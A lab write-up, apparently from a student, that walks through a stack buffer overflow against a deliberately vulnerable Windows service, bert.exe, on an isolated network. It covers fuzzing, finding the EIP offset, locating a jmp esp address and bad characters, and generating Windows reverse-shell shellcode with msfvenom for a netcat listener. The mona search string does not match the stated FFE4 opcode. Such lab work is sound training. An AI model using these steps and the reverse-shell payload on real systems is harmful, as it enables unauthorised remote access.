This lab involves the steps to creating a vulnerable system using the Bert.exe and Bert.dll software. This lab was performed on a Windows 10 Virtual machine on an isolated network. A kali linux machine was also used as the attacker system.

Bert.exe Basic Information

1. On the Windows device, run the bert.exe application. Make sure the .exe and .dll file are in the same location before running the application.
2. On the Windows device, with Bert.exe running, run the command netstat -aon in PowerShell to show listening ports on the system. This reveals that the Bert service is running on port 8777.
3. This can be confirmed by running an nmap scan from the kali device against port 8777 of the Windows device.

4. A connection can be made to the bert service using the nc command from the kali device. The command syntax is nc -nv WINDOWS_IP 8777. From here simple commands can be run to input values. The BERT command being used is shown below.

Buffer Overflow of Bert

The Immunity Debugger software was used in this lab to identify information to perform buffer overflow on the bert.exe application. Various python files were run against the target bert service from the kali machine. All fuzzer files are run using pyhton2. The files will be linked throughout the lab.

The Initial Fuzzing

To determine the amount of bytes the bert service can receive before crashing, a simple python file, called fuzzer1, can be used to send bytes to the service, using the BERT command identified previously, until the service stops and is no longer receiving bytes. The code for the fuzzer1 file can be found here. Make sure to use this file, as it is the basis for future files. If needed, change the IP address in the file to whatever the target device IP address is. The port specified in the file is 8777, which is the port for the bert service.

1. From the kali machine, run the fuzzer1.py file using python2: pyhton2 fuzzer1.py
2. The output will show the number of bytes that are sent so the service. The last value shown is the number of bytes before an overflow is triggered. This value is important. For the bert service, this value is 5900 bytes, as shown below.

Overwriting the EIP Value

The EIP specified instructions for the running service. Overwriting this value is important in executing buffer overflow for the bert service. The following steps outline how to overwrite EIP for the bert service.

1. Create a pattern of ASCII input with the length of 5900 bytes, using the command msf-pattern_create -l 5900. This command will output a block of ASCII text. Copy the text and paste it into a variable called "pattern" in a copy of the fuzzer1.py file, called fuzzer2.py. Modify the buffer variable to be the prefix plus the pattern, and remove the counter and while loop. An example of the fuzzer2.py file can be found here.

2. In Immunity debugger, restart bert.exe.

3. On the kali device, run fuzzer2.py. An output similar to the following should be recieved:

4. In Immunity Debugger, the process should have paused, and there should be a portion that shows different data inputs, including the EIP. Copy the value in EIP.

5. Using the copied EIP value, identify the offset using the command, msf-pattern_offset -l 5900 -q [EIP_VALUE], replacing [EIP_VALUE] with the copied EIP value.

6. Identify the jump breakpoint for bert by running msf-nasm_shell on linux, and then in the promt, type "jmp esp". This outputs a value of FFE4.

7. Restart bert.exe in Immunity debugger, and in the text entry bar at the bottom of the program, set the log folder for Immunity Debugger using the command !mona config -set workingfolder C:\logs\%p.

8. In Immunity debugger, in the text entry bar at the bottom of the program, type, !mona find -s "\xff\xef" -m bertdll.dll. This will identify instances where the "FFE4" pointer is found in the dll file. Copy the address from the first pointer. In this scenario, the address is "4350153c". Save this address for later.

9. Identify the bad characters for the buffer overflow process. This is characters that are invalid, so it is important to identify them. A simply python code can be used to do this. The code can be found here. Run the python file and copy the output. Save this for later.

10. Copy fuzzer2.py to a file called fuzzer5.py, and update it with the offset, jmp esp breakpoint address, and the badchars.py output. Do this by:

• Removing the pattern variable
• Updating the offset variable to be "'A' * 1753"
• Creating a variable called eip, and setting it to the address retrieved from the first instance of FFE4(this is added to the file in reverse order per two characters)
• Creating a badchars variable and pasting the badchars.py output as the value.
• Updating the buffer variable to add the prefix, offset, eip, and badchars variables together.

An example of the fuzzer5.py file can be found here.

---

NOTE: There are fuzzer3.py and fuzzer4.py files, but they are not pertinent to achieving a reverse shell, and were not used in this lab. If you would like to view these files, fuzzer3 and be found here, and fuzzer4 can be found here

---

11. Restart bert.exe from immunity debugger, and then on the kali machine run the fuzzer5.py file. In immunity debugger a message should appear stating that the process stopped and there was a breakpoint.

This confirms that the breakpoint works and now we can work on getting a reverse shell.

Gaining a Reverse Shell

Using the methods used up to this point, plus the addition of shellcode, buffer overflow can be used to exploit bert and retrieve a reverse shell. The following steps outline how to do so.

1. Generate shellcode for a reverse shell to the kali machine by running the following command.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.99.100 LPORT=7777 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f python

Make sure to set the LHOST to the attacker IP address and the LPORT to a port that will be used for an nc listener on the attacker device. Copy the shellcode generated by the command.

2. Copy the fuzzer5.py file to a file called fuzzer6.py. Update the fuzzer6.py file as follows:

• Beneath the eip variable, paste the shellcode generated by the msfvenom command.
• Directly above the pasted shellcode, add the line "sled = "\x90" * 32"
• Add the "sled" and "buf" variables to the "buffer" variable.

An example of fuzzer6.py can be found here.

3. Restart bert.exe in Immunity Debugger, OR close immunity debugger and start bert.exe normally.

4. Open a netcat listener on the port specified in the msfvenom command. The port I used it 7777, so the command looks as follows, nc -nlvp 7777

5. Run the fuzzer6.py file. A reverse shell should be granted on the netcat listener as the user who started the bert service.

Files Used In This Lab

• Fuzzer 1 Python
• Fuzzer 2 Python
• Badchars Python
• Fuzzer 5 Python
• Fuzzer 6 Python

Extra Files(from previous testing)

• Fuzzer 3 Python : used to further test EIP overwriting.
• Fuzzer 4 Python : used to check for any bad characters.